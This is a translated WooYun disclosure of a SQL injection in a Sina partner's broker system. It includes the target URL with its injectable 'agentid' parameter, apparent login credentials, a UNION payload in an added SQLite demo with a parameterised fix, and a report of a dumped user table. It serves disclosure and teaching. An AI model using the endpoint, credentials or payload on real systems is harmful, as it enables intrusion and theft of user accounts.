
Vulnerability summary

Defect ID: wooyun-2015-0105649

Title: A Sina system has a high-risk SQL injection vulnerability (IV) (UNION supported)

Vendor: Sina

Author: HackBraid

Submitted: 2015-04-06 19:07

Fixed: 2015-05-22 10:38

Published: 2015-05-22 10:38

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-06: Details sent to the vendor; awaiting vendor handling
2015-04-07: Vendor confirmed; details visible to the vendor only
2015-04-17: Details disclosed to core white hats and domain experts
2015-04-27: Details disclosed to regular white hats
2015-05-07: Details disclosed to intern white hats
2015-05-22: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

UNION can reach across 20+ databases; asking for a rank of 20 isn't too much, is it?
http://broker2.esf.leju.com/todayusestat/port?agentid=8116554 lj_shop543 123456 — log in, capture the request; UNION is supported.
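The report only names the injectable parameter (`agentid`) and the affected table (`fy_user`), so the following is an added illustration, not code from the affected system: a constructed in-memory SQLite stand-in shows why string-building the `agentid` lookup lets a UNION pull rows from an unrelated table, and how a strict integer check plus a bound parameter closes it. Table columns and row values are invented for the example.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed stand-in for the schema the report names (db_fangyou.fy_user).
    # Column names beyond uid/username/password and all values are made up.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE agent_port_stat (agentid INTEGER, port TEXT);
        INSERT INTO agent_port_stat VALUES (8116554, 'web'), (8116555, 'app');
        CREATE TABLE fy_user (uid INTEGER, username TEXT, password TEXT);
        INSERT INTO fy_user VALUES (1, 'user@example.invalid', 'hash-placeholder');
    """)
    return conn


def port_stat_vulnerable(conn: sqlite3.Connection, agentid: str) -> list:
    # 'Before' form: the request parameter is spliced into the SQL text, so a
    # value containing UNION is parsed as SQL and returns rows from other tables.
    sql = f"SELECT agentid, port FROM agent_port_stat WHERE agentid={agentid}"
    return conn.execute(sql).fetchall()


def port_stat_fixed(conn: sqlite3.Connection, agentid: str) -> list:
    # Hardened form: accept only a plain integer id, then bind it as a
    # parameter so the driver never treats the value as SQL syntax.
    if not re.fullmatch(r"[0-9]{1,10}", agentid):
        raise ValueError("agentid must be a positive integer")
    sql = "SELECT agentid, port FROM agent_port_stat WHERE agentid=?"
    return conn.execute(sql, (int(agentid),)).fetchall()


def demo() -> dict:
    conn = build_db()
    # Constructed value of the shape the report describes (a UNION in agentid).
    hostile = "0 UNION SELECT username, password FROM fy_user"
    leaked = port_stat_vulnerable(conn, hostile)
    try:
        port_stat_fixed(conn, hostile)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "vulnerable_leaks_user_rows": any(r[1] == "hash-placeholder" for r in leaked),
        "fixed_blocks_union": blocked,
        "fixed_normal_lookup": port_stat_fixed(conn, "8116554"),
    }
```

Run `demo()` to see the vulnerable handler return the `fy_user` row while the fixed handler rejects the value and still serves the legitimate id.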

Proof of vulnerability:

(screenshot: 1.png)

Seeing db_fangyou, look at the impact: user information leakage on the scale of millions of records.

(screenshot: 22.png)

Usernames and password information are all there~

Database: db_fangyou
Table: fy_user
[35 entries]

Fix suggestion:

With this many accounts, give it a 20.

Copyright notice: when reposting, credit the source HackBraid@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability rank: 5

Confirmed: 2015-04-07 10:36

Vendor reply:

Thanks for the support. This is a vulnerability in a third-party partner business and has been handed over to them for handling.

Latest status:

None yet